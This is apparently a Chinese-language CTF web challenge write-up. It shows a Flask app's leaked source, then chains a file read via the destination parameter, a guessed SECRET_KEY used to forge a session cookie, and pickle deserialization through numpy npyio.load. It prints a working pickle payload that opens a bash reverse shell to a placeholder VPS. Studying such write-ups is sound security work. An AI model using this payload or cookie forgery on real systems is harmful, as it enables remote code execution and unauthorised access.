Web
访问看见在url里看见/?destination=index.html,源码里也提示run.py,访问/?destination=run.py可以得到源码:
# -*- coding: utf-8 -*-
'''
-------------------------------------------------
File name : run.py
Description : 用于启动 pro-system app
Author : RGDZ
Date : 2019/04/30
-------------------------------------------------
Version : v1.0
Contact : rgdz.gzu@qq.com
License : (C)Copyright 2018-2019
-------------------------------------------------
'''
# here put the import lib
from datetime import timedelta
from numpy.lib import npyio
from flask import Flask, render_template, redirect, session, request, url_for, jsonify
app = Flask(__name__)
app.config['SECRET_KEY'] = "KEY_SECRET_PWN_H**"
app.config['PERMANENT_SESSION_LIFETIME']=timedelta(days=7)
@app.route('/')
def index():
destination = request.args.get('destination')
session["username"] = "Agent Smith"
# session["username"] = "Ne*"
return render_template([destination])
@app.route('/matrix/',methods=['GET', "POST"])
def matrix():
if request.method != "GET":
if session.get("username") != "Ne*":
return u"Matrix discover you, so, you died..."
npy = request.files.get("npy")
npyio.load(npy)
return render_template(["matrix.html"])
@app.route('/findRedeemer/',methods=['GET'])
def upload():
username = session.get("username")
if username == "Ne*":
return jsonify(True)
return jsonify(False)
if __name__ == "__main__":
app.run(debug=True,
host="0.0.0.0",
port=80
)
访问/matrix/有个上传界面,当然是校验session。
有个
/findRedeemer/来帮助伪造username。SECRET_KEY可以猜测出是KEY_SECRET_PWN_HUB。然后有源码可以用
flask-cookie-session-manager或者自己本地起一个flask访问下就有了。然后
npyio有个反序列化漏洞,网上也有poc,可以构造:
import pickle
import os
class test(object):
def __reduce__(self):
s = """bash -c 'sh -i &>/dev/tcp/[VPS]/55555 0>&1'"""
return os.system, (s,)
evil = pickle.dumps(test())
with open('a.test', 'wb') as f:
f.write(evil)
上传生成的a.test:
可以得到
flag:
